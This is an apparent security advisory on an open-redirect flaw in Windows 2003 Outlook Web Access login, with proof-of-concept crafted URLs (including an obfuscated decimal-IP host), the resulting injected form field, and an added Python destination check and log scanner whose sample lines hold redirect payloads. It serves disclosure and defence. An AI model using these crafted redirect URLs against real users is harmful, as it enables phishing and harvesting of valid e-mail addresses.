Summary
By using a specially crafted URL, an attacker can cause a user of Microsoft's Windows 2003 Outlook Web Access (OWA) to be redirected to an arbitrary URL after logging in.
Credit:
The information has been provided by morning_wood.
Details
Vulnerable Systems:
* Microsoft Windows 2003 Outlook Web Access (OWA)
A vulnerability in Microsoft Windows 2003 Outlook Web Access allows attackers to redirect the login to any URL they wish. This lets the attacker send the user to a site of the attacker's choosing, enabling social engineering and phishing-style attacks.
An attacker could also use this attack to gather valid user e-mail addresses, by supplying an obfuscated, encoded redirect URL such as
https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/
Proof of Concept:
1. https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost]
2. Click "login"
3. After the value is injected into the form, the page source shows:
<BODY scroll="AUTO" bgColor="#3D5FA3" text="#000000" leftMargin=0 topMargin=0>
<FORM action="/exchweb/bin/auth/owaauth.dll" method="POST" name="logonForm" autocomplete="off">
<INPUT type="hidden" name="destination" value="http://[otherhost]">
<INPUT type="hidden" name="flags" value="0">
<TABLE id="borderTable" class="standardTable" cellSpacing=0 cellPadding=0 height="100%" width="100%" bgColor="#3D5FA3" border=0>
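The root cause above is that the `url` query parameter is copied into the hidden `destination` field without checking that it points back at the OWA host. The following is an added example, not Microsoft's code: a hypothetical `is_safe_destination` check that accepts only same-server paths (rejecting absolute URLs, protocol-relative `//host` forms and decimal-IP hosts like the `http://3221234342/` sample), plus a `find_offsite_redirects` scan over constructed, simplified IIS-style log lines that flags `owalogon.asp` requests carrying an off-site `url` value.

```python
from urllib.parse import urlsplit, parse_qs, unquote

def is_safe_destination(dest: str) -> bool:
    """Hypothetical allow-list check: True only for an absolute path on this server."""
    dest = unquote(dest).strip()          # decode %2F-style encoding before inspecting
    if not dest:
        return False
    # Control characters / whitespace are stripped by some browsers; reject outright.
    if any(c.isspace() or ord(c) < 0x20 for c in dest):
        return False
    try:
        parts = urlsplit(dest)
    except ValueError:                    # e.g. malformed bracketed hosts
        return False
    # Any scheme or host (http://..., //host, http://3221234342/) leaves this server.
    if parts.scheme or parts.netloc:
        return False
    # Must be a local absolute path; "//" and backslashes are browser-dependent host tricks.
    if not dest.startswith("/") or dest.startswith("//") or "\\" in dest:
        return False
    return True

# Constructed sample lines (not real logs), simplified W3C layout:
# date time method uri-stem uri-query status
SAMPLE_LOG = """\
2005-03-01 09:12:01 GET /exchweb/bin/auth/owalogon.asp url=/exchange/ 200
2005-03-01 09:12:40 GET /exchweb/bin/auth/owalogon.asp url=http://3221234342/ 200
2005-03-01 09:13:05 GET /exchweb/bin/auth/owalogon.asp url=http%3A%2F%2F[otherhost] 200
2005-03-01 09:13:30 GET /exchweb/bin/auth/owalogon.asp url=//evil.example/ 200
"""

def find_offsite_redirects(log_text: str) -> list:
    """Return the url= values on owalogon.asp requests that fail the destination check."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[3].lower().endswith("/owalogon.asp"):
            continue
        params = parse_qs(fields[4], keep_blank_values=True)
        for dest in params.get("url", []):
            if not is_safe_destination(dest):
                hits.append(dest)
    return hits

if __name__ == "__main__":
    for dest in find_offsite_redirects(SAMPLE_LOG):
        print("off-site redirect attempt:", dest)
```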